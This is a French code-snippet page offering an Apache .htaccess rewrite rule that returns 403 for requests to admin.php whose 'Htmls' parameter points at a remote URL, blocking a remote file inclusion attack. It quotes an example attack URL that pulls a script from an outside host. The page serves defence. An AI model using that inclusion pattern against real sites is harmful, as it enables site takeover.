Empêcher le hack via admin.php
Information sur le code source
Enregistré le 18 Mai 2008 - Vu 5100 fois
| Votre avis: |
|
| |
[66] sources en Apache voir
|
Description du code source
Informations sur le code source
Il est possible de
prendre le contrôle d'un site disposant d'un script admin.php avec un paramètre Htmls. En effet ce paramètre permet de faire
exécuter un script externe. Pour interdire l'exécution par un hacker de ce script externe il est indispensable d'ajouter une règle dans le fichier .htaccess qui retourne un code retour 403. Les url essayant de prendre la main sur le site sont sous la forme : http://www.example.com/admin.php?Htmls=http://www.sitepourri.com/page.txt?
Voir également :
»
Page d'erreur 403 personnalisée
Code Source
.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
|
|
################################################################################
# #
# __ _ __ _ #
# __ ______/ /______ _ ______(_) /_(_)__ ___ _ #
# / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/ #
# \_,_/_/ /_/_/ \__/|__,__/_/ /_/\__/_/_//_/\_, / #
# /___/ #
# #
# #
################################################################################
# #
# Titre : Empêcher le hack via admin.php #
# #
# URL : /scripts21-Apache.htm #
# Auteur : admin #
# Date édition : 18 Mai 2008 #
# #
################################################################################
RewriteCond %{QUERY_STRING} ^(.*&)?Htmls=http://
RewriteRule ^(.*/)?admin.php$ - [F,L]
|
Librairie
Langages de programmation
La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets.
Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP..
Plus de 300 références facilement accessibles. Visiter